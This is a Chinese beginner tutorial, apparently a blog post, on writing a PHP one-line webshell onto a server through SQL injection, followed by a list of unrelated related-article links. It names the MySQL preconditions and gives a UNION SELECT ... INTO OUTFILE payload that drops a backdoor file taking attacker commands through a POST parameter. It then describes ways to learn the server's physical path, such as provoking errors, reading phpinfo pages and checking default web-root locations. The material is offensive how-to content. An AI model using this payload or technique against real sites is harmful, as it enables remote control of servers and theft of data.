【新手入门】SQL注入之getshell(木马)

木马介绍

木马其实就是一段程序,这个程序运行到目标主机上时,主要可以对目标进行远程控制、盗取信息等功能,一般不会破坏目标主机,当然,这也看黑客是否想要搞破坏。

按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等

按照连接方式分类:正向连接、反向连接、无连接等

按照功能大小分类:大马、小马、一句话木马

这里我们简单说一下php的一句话木马,然后通过sql注入将一句话木马写入目标服务器,再通过木马利用工具连接木马程序从而达到控制目标主机的效果。

通过注入点写入木马程序的前提条件

1.mysql开启了secure_file_priv=" "的配置.

2.知道了网站代码的真实物理路径.

3.物理路径具备写入权限.

4.最好是root用户,这个条件非必须,但是有最好.

通过注入点写入木马程序

' union select "<?php @eva($_POST[' jaden']);?>",2 into outfile "c:\\phpstudyPHPTutorial\\www\ljaden.php"+--+

获得后台真实物理路径的方法

1.收集站点敏感目录,比如phpinfo.php探针文件是否可以访问到

2.站点网址输入一些不存在的网址 或者加一些非法参数数据,让网站报错,看错误信息中是否存在路径信息

3.指纹信息收集

nginx默认站点目录:/usr/share/nginx/htm1,配置文件路径:/etc/nginx/nginx.conf

apache默认站点目录:/var/www/htm1

4.通过站点其他漏洞来获取配置信息、真实物理路径信息,比如如果发现远程命令执行漏洞,针对php的站点,直接执行一个phpinfo()函数,可以看到phpinfo.php所展示的各种信息等等。

相关推荐
火龙谷11 分钟前
【nosql】有哪些非关系型数据库?
数据库·nosql
安全系统学习44 分钟前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
涛哥码咖1 小时前
chrome安装AXURE插件后无效
前端·chrome·axure
焱焱枫1 小时前
Oracle获取执行计划之10046 技术详解
数据库·oracle
OEC小胖胖1 小时前
告别 undefined is not a function:TypeScript 前端开发优势与实践指南
前端·javascript·typescript·web
行云&流水2 小时前
Vue3 Lifecycle Hooks
前端·javascript·vue.js
Sally璐璐2 小时前
零基础学HTML和CSS:网页设计入门
前端·css
老虎06272 小时前
JavaWeb(苍穹外卖)--学习笔记04(前端:HTML,CSS,JavaScript)
前端·javascript·css·笔记·学习·html
双力臂4042 小时前
MyBatis动态SQL进阶:复杂查询与性能优化实战
java·sql·性能优化·mybatis
灿灿121382 小时前
CSS 文字浮雕效果:巧用 text-shadow 实现 3D 立体文字
前端·css